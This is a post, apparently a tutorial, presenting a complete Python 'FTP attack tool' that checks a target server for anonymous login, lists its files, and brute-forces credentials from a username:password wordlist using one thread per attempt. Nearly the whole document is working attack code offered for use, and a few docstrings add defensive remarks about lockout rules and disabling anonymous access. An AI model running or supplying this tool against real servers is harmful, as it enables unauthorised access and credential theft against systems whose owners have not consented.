利用Python编写完整的FTP攻击代码(包含匿名登录检查以及用户名密码暴力破解)
本代码主要包括以下方法:
1. 输入参数合理性检查,包括检查输入是否为合法的IP地址,输入的字典文件是否存在等;
2. 检查目标是否允许匿名登录
3. 基于字典破解FTP服务器的登录用户名与密码
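import ftplib
import ipaddress
import optparse
import os
import sys
import threading

try:
    import termcolor
except ImportError:
    # termcolor only colours the "found" message; fall back to plain text without it.
    termcolor = None


class ftp_attack:
    """Check one FTP server for anonymous access and for credentials from a wordlist.

    target   -- IP address of the FTP server, passed straight to ftplib.FTP.
    wordlist -- path to a text file with one "username:password" pair per line.
    """

    def __init__(self, target, wordlist):
        self.target = target
        self.wordlist = wordlist

    def checK_anonymous_login(self):
        """Report whether the target accepts the anonymous account.

        When the login succeeds, the names returned by NLST are printed as well.
        A host that should be private and is reported as allowing anonymous
        login needs anonymous access switched off in its server configuration.
        """
        try:
            with ftplib.FTP(self.target) as ftpclient:
                ftpclient.login('anonymous', 'anonymous')
                print("The Target Allows Anonymous Login!")
                # A failed listing must not turn an accepted login into
                # "not allowed"; treat it as an empty listing.
                try:
                    entries = ftpclient.nlst()
                except ftplib.all_errors:
                    entries = []
                for name in entries:
                    print(name)
        except ftplib.error_perm:
            # 5xx reply: the server answered and rejected the login.
            print("The Target Does Not Allow Anonymous Login!")
        except ftplib.all_errors as err:
            # Connection refused, timeout, protocol error: the check did not
            # run, so say that instead of reporting a rejection.
            print("Could not check anonymous login on the target: %s" % err)

    def ftp_login(self, username, password):
        """Try one username/password pair and print it if the server accepts it."""
        print("Trying username and password: %s %s" % (username, password))
        try:
            with ftplib.FTP(self.target) as ftpclient:
                ftpclient.login(username, password)
        except ftplib.all_errors:
            # Rejected login or connection problem: nothing to report for this pair.
            return
        message = "Username and password found for the target: %s %s" % (username, password)
        print(termcolor.colored(message, 'blue') if termcolor else message)

    def brute_forcer(self):
        """Run ftp_login in its own thread for every "username:password" line.

        Lines without a ':' separator (blank lines included) are skipped.
        Every entry is a separate connection and login attempt, so on the
        server the run shows up as a burst of failed logins from one address,
        which is the pattern lockout and rate-limit rules are written for.
        """
        with open(self.wordlist, 'r') as f:
            for line in f:
                fields = line.split(':')
                if len(fields) < 2:
                    continue
                username = fields[0].strip()
                password = fields[1].strip()
                # NOTE(review): one thread and one connection per entry with no
                # upper bound; a large wordlist exhausts local threads and the
                # server's connection slots.
                worker = threading.Thread(target=self.ftp_login, args=(username, password))
                worker.start()

    def run(self):
        """Run the anonymous-login check, then the wordlist check."""
        self.checK_anonymous_login()
        print("Begin to crack username and password!!!\n")
        print('======================================================')
        self.brute_forcer()


def check_target_valid(target):
    """Return True if target parses as an IPv4 or IPv6 address, else False."""
    try:
        ipaddress.ip_address(target)
    except ValueError:
        return False
    return True


def banner():
    """Print the start-up banner."""
    text = """
    ******************************************************************
    ******************************************************************
                  FTP Attack Tool by Jason Wong V1.0
    ******************************************************************
    ******************************************************************
    """
    print(text)


def get_params():
    """Parse -t/--target and -w/--wordlist and return them as (target, wordlist).

    Exits with status 1 when an option is missing, the target is not an IP
    address, or the wordlist is not an existing regular file.
    """
    parser = optparse.OptionParser("Usage: <Program> -t target -w wordlist")
    parser.add_option('-t', '--target', dest='target', type='string',
                      help='Specify target IP address')
    parser.add_option('-w', '--wordlist', dest='wordlist', type='string',
                      help='Specify file path of wordlist to crack')
    options, args = parser.parse_args()
    if options.target is None or options.wordlist is None:
        print(parser.usage)
        sys.exit(1)
    if not check_target_valid(options.target):
        print("[-] Please Enter right IP address of Target!")
        sys.exit(1)
    # isfile rather than exists: a directory would pass exists() and then
    # fail later in open().
    if not os.path.isfile(options.wordlist):
        print("[-] The File Does Not Exist")
        sys.exit(1)
    return options.target, options.wordlist


if __name__ == "__main__":
    banner()
    target, dict_list = get_params()
    ftpattack_instance = ftp_attack(target, dict_list)
    ftpattack_instance.run()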